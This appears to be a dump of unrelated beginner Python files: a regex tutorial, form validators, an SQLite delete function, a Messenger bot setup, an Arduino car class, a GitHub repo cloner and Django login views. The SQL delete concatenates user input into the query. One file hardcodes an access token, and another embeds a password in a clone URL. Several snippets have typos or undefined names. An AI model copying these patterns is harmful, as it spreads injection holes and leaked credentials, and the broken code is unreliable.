# '\S' - matches any non whitespace character - ~\s
re.search('\S+',string).group() #No whitespace , so full string is grabed
string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.
Vines and some fungi extend from their tips to explore their surroundings.
Elliot Hawkes of the University of California in Santa Barbara
and his colleagues designed a bot that works
on similar principles. Its mechanical body
sits inside a plastic tube reel that extends
through pressurized inflation, a method that some
invertebrates like peanut worms (Sipunculus nudus)
also use to extend their appendages. The plastic
tubing has two compartments, and inflating one
side or the other changes the extension direction.
A camera sensor at the tip alerts the bot when it’s
about to run into something.
In the lab, Hawkes and his colleagues
programmed the robot to form 3-D structures such
as a radio antenna, turn off a valve, navigate a maze,
swim through glue, act as a fire extinguisher, squeeze
through tight gaps, shimmy through fly paper and slither
across a bed of nails. The soft bot can extend up to
72 meters, and unlike plants, it can grow at a speed of
10 meters per second, the team reports July 19 in Science Robotics.
The design could serve as a model for building robots
that can traverse constrained environments
This isn’t the first robot to take
inspiration from plants. One plantlike
predecessor was a robot modeled on roots.'''
(re.findall('\S+',string)) #It is getting all the words that does'nt have any space
' '.join(re.findall('\S+',string)) # It removes all the spaces and join words and return the article
# . - The dot matches any character except new line
string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.
Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.
In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72 meters, and unlike plants, it can grow at a speed of 10 meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments
This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
re.search('.+',string).group()
#'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
# The above line is returned because dot will all character except new line
re.search('.+',string,flags = re.DOTALL).group() # It will include the new also
#Creating Your own character set
#[A-Z] - It means A to Z , '-' is a metacharacter It include all upper letter
string = 'Hello , There , How , Are , You'
re.findall('[A-Z]',string) # It will pull all upper case charcter
re.findall('[A-Z, ]',string) # It will pull all upper case charcter and a comma, here , is a charactter that we need to search
string = 'Hello , There , How , Are , You...'
re.findall('[A-Z,.]',string) # Same here dot is working as a charcter not like re dot i.e '.+' in line 192
re.findall('[A-Za-z,\s.]',string) # Here we are pulling A-Z capital,a-z small,comma,any space or whitespace and Dot
####################################################################################################
#Quatifier with Custom set
string = 'HELLO, There, How, Are, You...'
re.search('[A-Z]+',string) # Here HELLO is printed in upper case as we are asking for 1 or more capital case
re.findall('[A-Z]+',string) # Here 'HELLO', 'T', 'H', 'A', 'Y' is found as findall searches for whole string
re.findall('[A-Z]{2,}',string) # Here 'HELLO' 2 or more findall searches for whole string
re.search('[A-Za-z\s,]+',string) # one or more of 4 types of character
re.findall('[A-Z]?[a-z\s,]+',string) # Here ? means 0 or 1 and lower a-z \s and , for 1 or more
re.search('[^A-Za-z\s,]+',string) # Carrot inside of custom bracket means not this. Means not like A-Za-z\s
re.findall('[^A-Za-z]',string) # Not A-Z or Not a-z
#Groups
#Groups allow us to pull out section of a match and store them
string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
re.findall('[A-Za-z]+ \w+ \d+ \w+',string) # So here we are trying to find Any upper or lower case 1 or more followed by
# space and character followed by space and number followed by character
re.findall('([A-Za-z]+) \w+ \d+ \w+',string) # So here if you see we have given () inside 'qutoes' this is group
# Actually it is trying to make a group of A-Z and a-z
# here it gives John Susan Mike because when it started at beginging
# John is first group came then there space then Susan ..
match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)',string) # Here ([A-Za-z]+) = Group1,(\d+)=Group2,(\w+)=Group3
match.groups()
match.group(1)
match.group(1,2)
#Span - start and end
match.span() # It is showing the begining and end of match string - john is 'j' = 0 and end at 15
match.span(0) # Group 0 start and end location
# find all has no group function
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string).group(1) # It will throwh the error
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string) # It will return as list
re.findall('([A-Za-z]+) \w+ (\d+) (\w+)',string)[0] # It will return a tupple as slicing
data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))',string) #There we are putting small groups into large group
# 'John has 6 cats' This is main group
# 'John', '6', 'cats' - This is sub group
for i in data:
print(i[0])
# We can use Iteration
it = re.finditer('(([A-Za-z]+) \w+ (\d+) (\w+))',string) #Finditer -> It takes complete set of data and then 1 by 1 data
# is pulled from iter variable
next(it).group()
for element in it:
print(element.group())
#####################################################################################################
#Quantifier with Group
string = 'New York, New York 11369'
#([A-Za-z\s]+) -> city group
#([A-Za-z\s]+) -> State group
#(\d+) -> Number Group
match = re.search('([A-Za-z\s]+),([A-Za-z\s]+) (\d+)',string)
match
match.group(1),match.group(2),match.group(3),match.group(0) # Here we are representing the group with number
# i.e group[1]=city,group[2]=state and ... so it might be tough
# to remember the number if group is big so we take name in group
#To name a group - ?P<group name> , group name inside the <>,followed by RE for group
#(?P<city>)
pattern = re.compile('(?P<City>[A-Za-z\\s]+),(?P<State>[A-Za-z\\s]+)(?P<ZipCode>\\d+)')
#Here we are just saving the pattern of regular expression in a variable
match = re.search(pattern,string)
match.group('City'),match.group('State'),match.group('ZipCode')
#######################################################################################################
#Split
#Example 1
re.split('\.','Today is Sunny. I want to go the park. I want to ride by-cycle')
#Include split point
re.split('(\.)','Today is Sunny. I want to go the park. I want to ride by-cycle')
#split with point another example
split = '.'
[i+split for i in re.split('\.','Today is Sunny. I want to go the park. I want to ride by-cycle')]
#Try to split at each tag
string = '<p>My mother has <span style="color:blue">blue</span> eyes. </p>'
#so we write for alpha numeric character
re.split('<\w+>',string) # It will work as spaces and quatation mark is not port of alpha numeric
re.split('<.+>',string) # here we are getting 2 empty string becaz at first it looks for <p> and last </p>, + is greedy quantifier
re.split('<[^<>]+>',string) # when ^ inside [] means negates i.e any charcter that does'nt have <>
# so it will not take <> from entire string
#Handling empty string
[i for i in re.split('<[^<>]+>',string)]
#Alternative method
re.findall('>([^<]+)<',string) # here it starts with open > and take pattern which has does'nt start with < and then has
# end up with <
#Another example
string = ',happy , birthday,'
list(filter(None,string.split(','))) # here none any element that has no meaning i.e space,we filter it out
# filter is generator so list is used
#re.sub - It utilizes regular expression and then substitute series of words from output of regular expression
string ="""U.S. stock-index futures pointed
to a solidly higher open on Monday,
indicating that major
benchmarks were poised to USA reboundfrom last week’s sharp decline,
\nwhich represented their biggest weekly drops in months."""
print(re.sub('U.S|US|USA','United States',string)) # Here U.S|US|USA= Regular Expression,United States=Substitute word
# string = Original String. This is what re.sub works
#Using function with sub
#Brief explanation with lambda
def square(x):
return (x**2)
#With lambda
square = lambda x : x**2 # Here x before : is input and x**2 after : is output
# Lambda is quick way of creation of function which is small
square(3)
string = 'Dan has 3 snails. Mike has 4 cats. Alisa has 9 monkey'
#we are going to square digits i.e 3 to 9,4 to 16 and 9 to 81
re.search('(\d+)',string).group()
#It gives 3 as search will find first occurance
re.findall('(\d+)',string)
re.sub('(\d+)','1',string) # Here all digit is substituted with 1.
re.sub('(\d+)',lambda x:str(square(int(x.group(0)))),string)
# step 1 lambda x : x.group x is matching object and x is output of (\d+) this regular expression
# group(0) represents all group i.e not a specific group 1 or 2
# Turn the result into int
# use square function
# turn back to string
#Another example
input = 'eat laugh sleep study'
result = re.sub('(\w+)',lambda x:x.group(0)+'ing',input)
print(result)
#Backrefrencing
string = 'Merry Merry Christmas'
#We try to remove duplicate by backrefrencing
re.sub(r'(\w+) (\1)',r'Happy \1',string)
#So here we are putting group 1 with 'Happy' that was previously Merry
##############################################################################################################
#Word Boundaries
'''
\b - is called 'boundary' and allows to isolate word
- is similar to ^ and $ , it checks for location
'''
string = 'Cat Catherine Catholic wildCat copyCat unCatchable'
pattern = re.compile('Cat')
re.findall(pattern,string)
#It just to see for Cat from all the string But we want only Cat word not Cat from Catherine
#We use boundaries
pattern = re.compile(r'\bCat\b') #We are making a boundary from left and right to cat
re.findall(pattern,string)
#How \b works - It looks for both sides , left and right of boundary(\b) and insure that one side has one alphanumeric chr.
# and other side does'nt have alphanumric chr. so for word Catherine ,(Cat \b herine) it checks for chr left of boundary
# i.e \b and find alpha numeric chr and right to \b find another alpha numeric chr - so it does'nt satisfy condition
# But for 'wildCat' wild\bcat it checks for left and find alpha numeric chr i.e 'd' but in right non-alpha numeric chr(space)
# And it satify the condition
###########################################################################################################
#Capture
#Consume
#Capture is mainly used in connection with groups . When group output something then it is known as capture group
#So Group has 2 forms capture and Non Capture Group , Non Capture means the group matches with pattern but does'nt
#return anything and if it returns then it is capture group
#Consume - for example if we have 'Welcome to python'
# and we have pattern ('\w+') so for finding the pattern the cursor will start from W of Welcome and till e
# so regular expression consume From W to e and will consume Welcome. But when it goes after e then Space comes
# which is nothing but Non-Alphanumric character so cursor will to next word to and check for consumption
#Look Around dont consume, They allow us to conirm some sort of subpattern is ahead or
# behind main pattern
# 4 Types of Look Around
# 1. ?= ->Positive look around
# 2. ?! -> Negative look around(It means that the group does'nt have any subpattern ahead main pattern)
# 3. ?<= -> Positive look behind
# 4. ?<! -> Negative look behind (It means that the group does'nt have any subpattern behind main pattern)
#Similar Syntax
# ?: Non-capture group
# ?p Naming group
#Example
'''
In the below string we are looking to consume the second column value",
only if the first column starts with ABC and the last column ",
has the value 'active'
So only the first row and last row satisfies this condition which will
output the value '1.1.1.1' and 'x.x.x.x
'''
string = '''
ABC1 1.1.1.1 20151118 active
ABC2 2.2.2.2 20151118 inactive
ABC3 x.x.x.x xxxxxxxx active
'''
pattern = re.compile('ABC\w\s+ (\S+)\s+\S+\s+(?=active)') # Positive look around
# So here ABC is first we are looking follwed by alphanumeric chr i.e 1,2 or any word then followed by bunch of space
# then follwed by bunch of Non space chr , here we have taken (\S+) in group as we neeed to find only this part
# then follweed by bunch of space and then follwed by active , so here it is looking for active but not capturing it
re.findall(pattern,string)
re.search(pattern,string) # The output shows that it is not capturing active but only taking it to look in pattern
#However we can also use non-captruing group
pattern = re.compile('ABC\w\s+ (\S+)\s+\S+\s+(?:active)')
re.findall(pattern,string)
re.search(pattern,string) # But here in output it is consuming active word, so if we want to specify some condition then
#use non-captruing group
#look aheads don't consume, non-capture group consumes
string ='abababacb'
#so we need to find wherever a's surronded by b , here we have 2 cases
pattern = re.compile('(?:b) (a) (?:b)')
re.findall(pattern,string)
#Here we did'nt get any result becoz when cursor starts from a and goes to b then there is no match as a is not surronded
# But when it goes for second occurance of a it should give the result as here 2nd a is surronded by b , but since
# cursor has already consume the 'b' at 2nd position for finding first a sp it starts from 2nd occurance of a
# and again when it starts from a there is no b behind 2nd occuance of a
#But when we give look around
pattern = re.compile('(?<=b)(a)(?=b)')
re.findall(pattern,string)
# Here it goes for 'a' and find 'b' behind and it fails but for 2nd occcurance of 'a' there b is behind and after a
# Here it does'nt consume first occurance of 'b'
####################################################################################################
|
996,862 | 8419f0225e4b5bbafd79d433faf727a81ef922d5 | import cgi
#dates
months = ['January',
'February',
'March',
'April',
'May',
'June',
'July',
'August',
'September',
'October',
'November',
'December']
def valid_month(month):
if month.title() in months:
return month.title()
def valid_day(day):
if day.isdigit():
day = int(day)
if day>0 and day<32:
return int(day)
def valid_year(year):
if year and year.isdigit():
year = int(year)
if year>1899 and year<2021:
return year
#validation
def escape_html(s):
return cgi.escape(s, quote = True) |
996,863 | 4df7f4c758cbe6af348d7bd33737eb4c75447e87 | def delete():
conn = sqlte3.connet("tasklist.db")
c = conn.cursor
c.execute("DELETE FROMtaska WHERE oid=" + delete_box.get())
delete_box.delete(0, END)
# commit changes
conn.commit()
# close connection
conn.close |
996,864 | 7b106035a1b14d413ef6481fe3cf19d0a4c5f92c | import requests
from flask import url_for
from application.core.constants import LANDING_MESSAGE
# ACCESS_TOKEN = os.environ['ACCESS_TOKEN']
ACCESS_TOKEN = 'EAACy5fCj3rgBAP98hkUBZB2GCgecTnWfPz1b47b0SeLSq2QZAD8lvJxZCrnNlxrvuEQV3vVxqQ3CNER49BZCTlAlBvPMx6XX0f8K8cPGF9cQvXgJwboPLVwJPxOuMrZAAWl2AFaCSFJ2EROyhPEVxv0hfiZClqqy6bZC5ylpXfotAZDZD'
# VERIFY_TOKEN = os.environ['VERIFY_TOKEN']
VERIFY_TOKEN = 'some_verify_token'
MESSENGER_PROFILE_URL = (
'https://graph.facebook.com/v2.6/me/messenger_profile?access_token=%s' %
ACCESS_TOKEN)
['Schools', 'Jobs', 'Events', 'News', 'Posts', 'Projects']
side_menu_payload = {
"persistent_menu": [
{
"locale": "default",
"composer_input_disabled": False,
"call_to_actions": [
{
"title": "Courses",
"type": "postback",
"payload": "DISPLAY_ALL_COURSES"
},
{
"title": "Projects",
"type": "postback",
"payload": "DISPLAY_ALL_PROJECTS"
},
{
"title": "More",
"type": "nested",
"call_to_actions": [
{
"title": "Events",
"type": "postback",
"payload": "DISPLAY_ALL_EVENTS"
},
{
"title": "Jobs",
"type": "postback",
"payload": "DISPLAY_ALL_JOBS"
},
{
"title": "More",
"type": "nested",
"call_to_actions": [
{
"title": "Feeds",
"type": "postback",
"payload": "DISPLAY_ALL_FEEDS"
},
{
"title": "News",
"type": "postback",
"payload": "DISPLAY_ALL_NEWS"
},
{
"title": "Blocs",
"type": "web_url",
"url":
'https://blocs-backend.herokuapp.com/blocs'
}
]
}
]
},
]
}
]
}
def add_side_menu():
return requests.post(MESSENGER_PROFILE_URL, json=side_menu_payload).content
def add_get_started():
payload = {
"get_started": {
"payload": "GET_STARTED_PAYLOAD"
}
}
return requests.post(MESSENGER_PROFILE_URL, json=payload).content
def add_greeting():
payload = {
"greeting": [
{
"locale": "default",
"text": LANDING_MESSAGE
}, {
"locale": "en_US",
"text": LANDING_MESSAGE
}
]
}
return requests.post(MESSENGER_PROFILE_URL, json=payload).content
if __name__ == '__main__':
# print(add_get_started())
print(add_side_menu())
print(add_greeting())
|
996,865 | 6456ec6e482bcec0d8f8bb29b1552d6a64bc8a08 | #!/usr/bin/env python
import time
import serial
class car:
def __init__(self, port = '/dev/ttyACM0',baud_rate = 9600):
try:
self.car = serial.Serial(port, 9600)
print "Arduino connected on port {}".format(port)
except (RuntimeError, TypeError, NameError):
print "Not able to connect arduino on port {}".format(port)
self.Lval_for_motor = 0; # this is the lower value of PWM for motor
self.Hval_for_motor = 255;
self.lastThrottle = 0
#entering the analog value for left adn right wheel between 0 - 100
def map(self, val,inputL, inputH, outputL , outputH ):
val1 = (float(val)/(inputH - inputL))*(outputH - outputL ) + outputL
return int(val1)
def forward(self,aleft, aright):
aleft = self.map(aleft, 0, 100, self.Lval_for_motor, self.Hval_for_motor )
aright = self.map(aright,0, 100, self.Lval_for_motor, self.Hval_for_motor )
self.car.write('w' + chr(aleft) + chr(aright))
def right(self,aleft, aright):
aleft = self.map(aleft,0, 100, self.Lval_for_motor, self.Hval_for_motor )
aright = self.map(aright,0, 100, self.Lval_for_motor, self.Hval_for_motor )
self.car.write('d' + chr(aleft) + chr(aright))
def left(self,aleft, aright):
aleft = self.map(aleft,0, 100, self.Lval_for_motor, self.Hval_for_motor )
aright = self.map(aright,0, 100, self.Lval_for_motor, self.Hval_for_motor )
self.car.write('a' + chr(aleft) + chr(aright))
def reverse(self,aleft, aright):
aleft = self.map(aleft,0, 100, self.Lval_for_motor, self.Hval_for_motor )
aright = self.map(aright,0, 100, self.Lval_for_motor, self.Hval_for_motor )
self.car.write('s' + chr(aleft) + chr(aright))
def stop(self,aleft = 0, aright = 0):
aleft = self.map(aleft,0, 100, self.Lval_for_motor, self.Hval_for_motor )
aright = self.map(aright,0, 100, self.Lval_for_motor, self.Hval_for_motor )
self.car.write('x' + chr(aleft) + chr(aright))
def throttle(self, throt):
self.forward(throt, throt)
self.lastThrottle
def brake(self, mode = 0 , brak = 100):
# crearing different kind of modes
'''
mode = 0 => taking the forward pwm to 0
mode = 1 => enabling the halt feature in motor driver"
mode = 2 => delayed halt while taking pwm down slowly
'''
if mode == 0:
self.forward(0,0)
elif mode == 1:
self.stop()
elif mode == 2:
while val > 0:
self.forward(self.lastThrottle, self.lastThrottle)
self.lastThrottle = self.lastThrottle - brak
# tune the sleep value
time.sleep(0.01)
|
996,866 | 1a02545ad87d5b3eb7d6684b94aab0b39eb816eb | import os
import requests
import git
import shutil
from getpass import getpass
ORG = 'EC327-Fall2019'
def parse_students():
students = []
student_count = 0
while True:
filename = input("Enter the path to your usernames file: ")
if os.path.exists(filename):
break
print("Invalid file")
with open(filename, 'r') as file:
for line in file:
if line.rstrip('\n'):
student_count += 1
students.append(line.rstrip('\n'))
print(f'Succesfully parsed {student_count} student usernames')
return students, student_count
def get_credentials():
username = input("Enter either your GitHub username or email: ")
password = getpass("Enter your GitHub password: ")
return username, password
def download_assignments(students, username, password):
assignment = input("Enter the assignment name (ex: PA1): ")
assignment_path = input("Enter the directory to dump all the repos (leave blank to use assignment name): ")
if not assignment_path.replace(' ', ''):
assignment_path = assignment
os.makedirs(assignment_path, exist_ok=True)
success_count = 0
fail_students = []
for student in students:
student_path = os.path.join(assignment_path, student)
if (os.path.exists(student_path)):
shutil.rmtree(student_path)
os.makedirs(student_path)
try:
git.Git(student_path).clone(f"https://{username}:{password}@github.com/{ORG}/{assignment}-{student}.git", assignment)
print(f"Cloned {assignment} repo of student {student} to {student_path}")
success_count += 1
except Exception as e:
print(f"Failed to clone {assignment} repo of student {student}")
print(f"Error: {e}")
shutil.rmtree(student_path)
fail_students.append(student)
print(f"\nSuccesfully downloaded {success_count} repos")
print(f"Failed to download {len(fail_students)} repos\n")
if (len(fail_students)):
print(f"Failed for students: {fail_students}\n")
if __name__ == '__main__':
students, student_count = parse_students()
username, password = get_credentials()
download_assignments(students, username, password)
|
996,867 | a7ca18c6fefb9afdec3d94a3ab85a668c8e9ed85 | # Fails : 181. py
# Autors : Egils Keišs
# Apliecibas numurs : 181REB314
# Datums : 03.12.18
# Sagatave funkcijas saknes mekleeshanai ar dihatomijas metodi
# -*- coding : utf -8 -*-
from math import cos, fabs
from time import sleep
def f1(x):
return ((x*x)+x+1)/((cos(x)*cos(x)+0.1)
h=0
a = 0.; b = 6.2832
I1 = 0.
eps = 0.0001
I2 = (b-a) * ( f1(a) + f1(b) ) / 2
while (fabs(I2-I1)>eps):
n=n*2
h=(b-a)/n
I1=I2
I2=0
k=0
for k in range (0, n):
I2=I2+h*f1(a+(k+0.5)*h)
print("a = %d, b =%d" %(a,b))
print ("Integrals:" ,I2)
print ("Iteraciju skaits:" ,k)
|
996,868 | cf6f19680bfe942e813a3e922b207c7be9cf8b54 | # -*- coding: utf-8 -*-
import datetime
from django.db import transaction
from django.db.models import Q
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib import auth, messages
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy, reverse
from django.utils import timezone
from django.views.generic.base import View
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from django.contrib.auth.models import User
from captcha.helpers import captcha_image_url
from captcha.models import CaptchaStore
from menu.views import get_user_grant_list
from .models import UserProfile, SlotEmailGroup
from .forms import LoginForm, RegisterForm, ForgetPwdForm, ModifyPwdForm, MyProfileForm, QuoteUserForm, ResetPwdForm
from .forms import SlotUserUpdateForm, SlotUserForm
from .forms import email_check
from django.shortcuts import redirect
from quote.models import Company, UserSetupProfit, UKRange, EuroCountry
MY_MENU_LOCAL = 'MY_PROFILE'
@login_required
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/user/login")
@login_required
def pwd_change(request, pk):
user = get_object_or_404(User, pk=pk)
if request.method == "POST":
form = ModifyPwdForm(request.POST)
if form.is_valid():
password = form.cleaned_data['old_password']
username = user.username
user = auth.authenticate(username=username, password=password)
if user is not None and user.is_active:
new_password = form.changed_data['password2']
user.set_password(new_password)
user.save()
return HttpResponseRedirect("user/login")
else:
return render(request, 'password_reset.html', {"form": form,
"user": user,
"message": "Old password is wrong. Try again",
'menu_active': 'PA',
})
else:
form = ModifyPwdForm()
return render(request, 'password_reset.html', {'form': form, 'user': user})
# 用户登录
class LoginView(View):
def get(self, request):
# 图片验证码
# hashkey验证码生成的秘钥,image_url验证码的图片地址
hashkey = CaptchaStore.generate_key()
image_url = captcha_image_url(hashkey)
login_form = LoginForm()
# Python内置了一个locals()函数,它返回当前所有的本地变量字典
return render(request, "sign-in.html", locals())
def post(self, request):
login_form = LoginForm(request.POST)
username = request.POST.get("username", "")
pass_word = request.POST.get("password", "")
system_name = request.POST.get("system_name", "BOOKING-SYSTEM")
if login_form.is_valid():
if email_check(username):
filter_result = User.objects.filter(email__exact=username)
if filter_result:
username = filter_result[0].username
else:
filter_result = User.objects.filter(username__exact=username)
if filter_result:
username = filter_result[0].username
user = authenticate(username=username, password=pass_word)
if user is not None:
if user.is_active:
login(request, user)
# 分别登陆两个系统
if system_name in user.profile.system_menu:
if system_name == "BOOKING-SYSTEM":
return redirect("slot:slot_list") # 登陆BOOKING-SYSTEM系统
else:
return redirect("users:my_profile", pk=user.id) # 登陆 Quote 系统
else:
# 直接导向用户可以登录的系统
if user.profile.system_menu == "BOOKING-SYSTEM":
return redirect("slot:slot_list") # 登陆BOOKING-SYSTEM系统
else:
return redirect("users:my_profile", pk=user.id) # 登陆 Quote 系统
else:
hashkey = CaptchaStore.generate_key()
image_url = captcha_image_url(hashkey)
msg = "User is be suspend. Please contact system administrator."
return render(request, "sign-in.html", locals())
else:
# 图片验证码
# hashkey验证码生成的秘钥,image_url验证码的图片地址
hashkey = CaptchaStore.generate_key()
image_url = captcha_image_url(hashkey)
msg = "Error username or password."
# Python内置了一个locals()函数,它返回当前所有的本地变量字典
return render(request, "sign-in.html", locals())
else:
hashkey = CaptchaStore.generate_key()
image_url = captcha_image_url(hashkey)
# Python内置了一个locals()函数,它返回当前所有的本地变量字典
return render(request, "sign-in.html", locals())
# 用户注册 - 尚未完成
class RegisterView(View):
def get(self, request):
register_form = RegisterForm()
return render(request, "register.html", {"register_form": register_form})
def post(self, request):
register_form = RegisterForm(request.POST)
if register_form.is_valid():
user_name = request.POST.get("email", "")
pass_word = request.POST.get("password", "")
if UserProfile.objects.filter(email=user_name):
return render(request, "register.html", {"register_form": register_form, "msg": "email is existed"})
# send_register_email(user_name, "register")
return render(request, "register_mail_success.html")
else:
return render(request, "register.html", {"register_form": register_form})
# 忘记密码 - 尚未完成
class ForgetPwdView(View):
def get(self, request):
forgetpwd_form = ForgetPwdForm()
return render(request, "forgetpwd.html", {"forgetPwd_form": forgetpwd_form})
def post(self, request):
forgetpwd_form = ForgetPwdForm(request.POST)
if forgetpwd_form.is_valid():
email = request.POST.get("email", "")
if not (UserProfile.objects.filter(email=email)):
return render(request, "forgetpwd.html",
{"forgetPwd_form": forgetpwd_form, "msg": "Email address can't be found."})
# send a new mail for reset password
# send_register_email(email, "forget")
return render(request, "send_resetPwd_success.html")
else:
return render(request, "forgetpwd.html", {"forgetPwd_form": forgetpwd_form})
# 重置 QUOTE 系统 用户密码
class ResetPwdView(View):
def get(self, request, pk):
user = User.objects.get(id=pk)
return render(request, "user_profile_detail_reset_password.html", {"menu_active": 'USERS',
'user': user
})
def post(self, request, pk):
reset_pwd_form = ResetPwdForm(request.POST)
user = User.objects.get(id=pk)
password = request.POST.get("password", "")
re_password = request.POST.get("re_password", "")
if reset_pwd_form.is_valid():
user.set_password(password)
user.save()
# return redirect('users:edit_quote_user', pk=pk)
return render(request, "user_profile_detail_reset_password_success.html",
{"menu_active": 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'reset_pwd_form': reset_pwd_form,
"user": user,
'password': password,
're_password': re_password,
})
else:
return render(request, "user_profile_detail_reset_password.html", {"menu_active": 'USERS',
'menu_grant': get_user_grant_list(
request.user.id),
'reset_pwd_form': reset_pwd_form,
"user": user,
'password': password,
're_password': re_password,
})
# 更新 QUOTE system 的用户密码
class ChangeQuoteUserPwdView(View):
def get(self, request, pk):
user = User.objects.get(id=pk)
return render(request, "user_change_password.html", {"menu_active": MY_MENU_LOCAL,
'menu_grant': get_user_grant_list(request.user.id),
'user': user,
})
def post(self, request, pk):
old_password = request.POST.get("old_password", "")
password = request.POST.get("password", "")
re_password = request.POST.get("re_password", "")
user = auth.authenticate(username=request.user.username, password=old_password)
if user is not None and user.is_active:
new_password = request.POST.get("password", "")
change_pwd_form = ModifyPwdForm(request.POST)
if change_pwd_form.is_valid():
user.set_password(new_password)
user.save()
return redirect('users:login')
else:
return render(request, "user_change_password.html", {"menu_active": MY_MENU_LOCAL,
'menu_grant': get_user_grant_list(request.user.id),
'change_pwd_form': change_pwd_form,
'message': '',
'old_password': old_password,
'password': password,
're_password': re_password,
})
else:
return render(request, 'user_change_password.html', {'menu_active': MY_MENU_LOCAL,
'menu_grant': get_user_grant_list(request.user.id),
"message": "Old password is wrong. Try again",
'old_password': old_password,
'password': password,
're_password': re_password,
})
# 退出系统
class LogoutView(View):
def get(self, request):
logout(request)
# 图片验证码
# hashkey验证码生成的秘钥,image_url验证码的图片地址
hashkey = CaptchaStore.generate_key()
image_url = captcha_image_url(hashkey)
login_form = LoginForm()
# Python内置了一个locals()函数,它返回当前所有的本地变量字典
return render(request, "sign-in.html", locals())
# 用户资料
class MyProfile(DetailView):
model = User
template_name = 'my_profile.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
all_company = Company.objects.all()
context['menu_active'] = MY_MENU_LOCAL
context['menu_grant'] = get_user_grant_list(self.request.user.id)
context['all_company'] = all_company
return context
# 更新 QUOTE 用户资料
class MyProfileUpdateView(UpdateView):
model = User
form_class = MyProfileForm
template_name = 'my_profile_update.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
all_company = Company.objects.all()
context['menu_active'] = MY_MENU_LOCAL
context['menu_grant'] = get_user_grant_list(self.request.user.id)
context['all_company'] = all_company
return context
def form_invalid(self, form): # 定义表对象没有添加失败后跳转到的页面。
response = super().form_invalid(form)
return response
def form_valid(self, form):
user_profile = UserProfile.objects.filter(user_id=self.kwargs['pk'])
user_profile.update(telephone=form.data['telephone'], favorite_company=form.data['favorite_company'])
return super(MyProfileUpdateView, self).form_valid(form)
def get_success_url(self):
return reverse_lazy("users:my_profile", kwargs={'pk': self.object.pk})
# 新增 QUOTE 用户
class AddUserView(View):
def get(self, request):
all_company = Company.objects.all()
return render(request, "add_user_profile.html", {'menu_active': 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'all_company': all_company,
})
def post(self, request):
user_form = QuoteUserForm(request.POST)
all_company = Company.objects.all()
if not user_form.is_valid():
return render(request, "add_user_profile.html", {'user_form': user_form,
'menu_active': 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'all_company': all_company,
})
# 新增记录, 需要写2个表 auth_user, users_userprofile
# auth_user默认值设置
# user.is_staff = 0 不是staff
# user.is_active = 1 是
# user.is_superuser = 0 不是
uk_range = UKRange.objects.all()
euro_country = EuroCountry.objects.all()
# get all data from user_form
email = request.POST.get("email", "")
username = request.POST.get('username')
first_name = request.POST.get('first_name')
last_name = request.POST.get('last_name')
telephone = request.POST.get('telephone', '')
permission = "000000000000"
booking_system = request.POST.get("booking_system", "")
quote_system = request.POST.get("quote_system", "")
if booking_system and quote_system:
system_menu = "BOOKING-SYSTEM|QUOTE-SYSTEM"
else:
if booking_system:
system_menu = "BOOKING-SYSTEM"
else:
system_menu = "QUOTE-SYSTEM"
# 新增用户
with transaction.atomic():
User.objects.create(username=username,
email=email,
first_name=first_name,
last_name=last_name,
is_staff=0,
is_active=1,
is_superuser=0,
last_login=timezone.now(),
date_joined=timezone.now(),
)
# 保存密码
user = User.objects.get(username__exact=username)
if user is not None and user.is_active:
password = request.POST.get('password')
user.set_password(password)
user.save()
# 新增用户附加资料
uk_percent = 0
uk_fix_amount = 0
euro_percent = 0
euro_fix_amount = 0
fav_company = 1 # 默认用户最喜爱的公司为1 - PARCEL FORCE
with transaction.atomic(): # 新增用户附加资料 users_userprofile
UserProfile.objects.create(user_id=user.id,
telephone=telephone,
mod_date=datetime.datetime.now(),
staff_role=0,
favorite_company_id=fav_company,
euro_fix_amount=euro_fix_amount,
euro_percent=euro_percent,
uk_fix_amount=uk_fix_amount,
uk_percent=uk_percent,
menu_grant=permission,
system_menu=system_menu,
)
with transaction.atomic():
for uk in uk_range: # 英国本地的利润率 新增用户的利润设置表 q_user_setup_profit
UserSetupProfit.objects.create(is_uk='UK',
fix_amount=uk_fix_amount,
percent=uk_percent,
uk_area_id=uk.id,
user_id=user.id,
)
for euro in euro_country: # 欧洲的利润率,新增用户的利润设置表 q_user_setup_profit
UserSetupProfit.objects.create(is_uk='EURO',
fix_amount=euro_fix_amount,
percent=euro_percent,
euro_area_id=euro.id,
user_id=user.id,
)
return HttpResponseRedirect(reverse('quote:user-list'))
# 编辑 QUOTE 用户
class EditUserView(View):
def get(self, request, pk):
all_company = Company.objects.all()
user = User.objects.get(id=pk)
return render(request, "user_profile_detail.html", {'menu_active': 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'all_company': all_company,
'user': user,
})
def post(self, request):
user_form = QuoteUserForm(request.POST)
all_company = Company.objects.all()
if not user_form.is_valid():
return render(request, "add_user_profile.html", {'user_form': user_form,
'menu_active': 'USERS',
'menu_grant': get_user_grant_list(request.user.id),
'all_company': all_company,
})
